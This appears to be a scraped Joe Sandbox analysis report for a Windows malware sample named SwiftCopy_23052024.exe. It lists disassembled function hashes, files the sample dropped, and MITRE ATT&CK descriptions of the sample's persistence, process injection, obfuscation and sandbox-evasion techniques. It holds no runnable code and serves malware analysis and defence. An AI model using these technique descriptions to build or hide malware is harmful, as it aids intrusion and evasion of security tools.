Opcode ID: 2a2df6324fad1cda801f48fd1ba82d564b847810c6640163a2f43528b399a554
Instruction ID: a125e0afef17edd2ad0b79194662a677fb2f9e38b53fac9aefc779517ddb22e9
Opcode Fuzzy Hash: 2a2df6324fad1cda801f48fd1ba82d564b847810c6640163a2f43528b399a554
Instruction Fuzzy Hash: F341AE3AA00315DFC705CF99C984A59BBF5EF89354725C56BD8089B719EB31ED82CB80

Function 22529126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 22582559

Strings

$, xrefs: 22529191
@, xrefs: 22529175

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 960c241f1ca7b66320e892219b7b860b6789ac7e139396e5924d0d369c51a57e
Instruction ID: 293aa799c900c7957f2f9f9f54f255cf65a3a16c6a4216d9a522136f8f055b79
Opcode Fuzzy Hash: 960c241f1ca7b66320e892219b7b860b6789ac7e139396e5924d0d369c51a57e
Instruction Fuzzy Hash: E0814C71D007699BDB31CB54CD44BEEBBB4AF48714F1082DAAA19B7280D7709E80CFA1

Function 22554D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 22554D64

Strings

LdrpFindDllActivationContext, xrefs: 22593636, 22593662
minkernel\ntdll\ldrsnap.c, xrefs: 22593640, 2259366C
Querying the active activation context failed with status 0x%08lx, xrefs: 2259365C
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 2259362F

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: d5bfdc39d9a2ac8540ea67b94b83ac1e4b27d682feb758a8d5511aa3a6c33740
Instruction ID: f4f0ffb604fd8299acb92fb7375de9049f27586452c5ee576432ec8c0949d66b
Opcode Fuzzy Hash: d5bfdc39d9a2ac8540ea67b94b83ac1e4b27d682feb758a8d5511aa3a6c33740
Instruction Fuzzy Hash: 36311832900751EADB119F04CE88F6ABBE4EB01758F06C527E9047B261E7A4AEE0C7D5

Function 225D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 225D238D
___swprintf_l.LIBCMT ref: 225D23B3

Strings

]:%u, xrefs: 225D23AA
%%%u, xrefs: 225D2384

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 00fd67edad543150f66e40998d633a6e53fe0f4789f9c7dca84d45b41071e8c6
Instruction ID: 2fff15c6b55d174a7b7ae63e253f28e7556691647a987cc6a1526924a5891c41
Opcode Fuzzy Hash: 00fd67edad543150f66e40998d633a6e53fe0f4789f9c7dca84d45b41071e8c6
Instruction Fuzzy Hash: 1A314172A10319AFDB10CF2DCD50BAE77B8EB54614F508596E949E3245EB70EA448BA0

Function 2254EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ece2a8fabd6c18aa5620e5a8f0952bf525b4635411972989503c1d8b4725de8
Instruction ID: 7e9cad7488fe3c7b2a44e3268ea854969407eae9d41eee9d6ace61cd7cee6ecc
Opcode Fuzzy Hash: 8ece2a8fabd6c18aa5620e5a8f0952bf525b4635411972989503c1d8b4725de8
Instruction Fuzzy Hash: BCE1BF75D00708DFCB25CFA9DA80A9DFBF1BF48314F20896AE945A7265DB70A981CF50

Function 2259EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2259EFE1
RtlDebugPrintTimes.NTDLL ref: 2259F009
RtlDebugPrintTimes.NTDLL ref: 2259F0AC
RtlDebugPrintTimes.NTDLL ref: 2259F160

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: befbdf6bc8a7a37a4f80392d45969ae977d0f879241ca3683664725a57a6f3bd
Instruction ID: 92892fbbd6467b58a4fce8ac37ffea61e588e4c258feb3bef36f2704d25dbec5
Opcode Fuzzy Hash: befbdf6bc8a7a37a4f80392d45969ae977d0f879241ca3683664725a57a6f3bd
Instruction Fuzzy Hash: 5671E271A013199FDF05CFA4CA80BDDBBB5FF48314F14812AEA05AB254DB34AA45CFA5

Function 225FA4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 225FA577
RtlDebugPrintTimes.NTDLL ref: 225FA62A
RtlDebugPrintTimes.NTDLL ref: 225FA64E
RtlDebugPrintTimes.NTDLL ref: 225FA663

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 663e66d7039e1ab65002ace455c282b112b3ac5150f473bce931fe5939ccb7e3
Instruction ID: 081a3ce2c079cf587eda4fd88726c6acfa9539ad6d231e8938c4921e88e76eb5
Opcode Fuzzy Hash: 663e66d7039e1ab65002ace455c282b112b3ac5150f473bce931fe5939ccb7e3
Instruction Fuzzy Hash: F0516C357017129FDF08CE19C5A5A297BF1FB8A314B10856DEA06CB724DB78ED41CB82

Function 2259F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2259F26D
RtlDebugPrintTimes.NTDLL ref: 2259F292
RtlDebugPrintTimes.NTDLL ref: 2259F324
RtlDebugPrintTimes.NTDLL ref: 2259F378

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: fe532e8a78ebf0f49c1ef3930f5df8644be88466d2aca0a92cc0802d2d09d388
Instruction ID: 61446d21f115f304f419c8792d9d5bd0c91e4426e0453ee43afee828cc266653
Opcode Fuzzy Hash: fe532e8a78ebf0f49c1ef3930f5df8644be88466d2aca0a92cc0802d2d09d388
Instruction Fuzzy Hash: 035111B2E103199FDF04CF95D945ADDBBB1BF88314F14812AE905AB250DB38AA41CF90

Function 22554C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 22554CC3
Flst, xrefs: 22554C96

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 3508d61268790649c8fb83bb4add28559977245f60b3e143ee91769bca42601e
Instruction ID: bcdb37f6e8d1f67676a647d5c2a1a197353ed933b90d8e4957618208403727df
Opcode Fuzzy Hash: 3508d61268790649c8fb83bb4add28559977245f60b3e143ee91769bca42601e
Instruction Fuzzy Hash: C15169B1A00358DBCB15CF99C6847ADFBF4EF44718F54C46AD049AF251E771AA85CB80

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SwiftCopy_23052024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\Tabsgivende.exe

C:\Users\user\AppData\Local\Temp\Tabsgivende.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onuf0bov.2vx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqmiw5gs.ome.ps1

C:\Users\user\AppData\Local\Temp\acrometer.ini

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Clas.Fre

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\Betnksomst.sir

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\Deagol.lyn

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\Elmore.whi

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\cellinas.pre

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\computerbrugeres.sts

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\flokken.ave

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\hydrolytisk.cun

Windows Analysis Report
SwiftCopy_23052024.exe

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre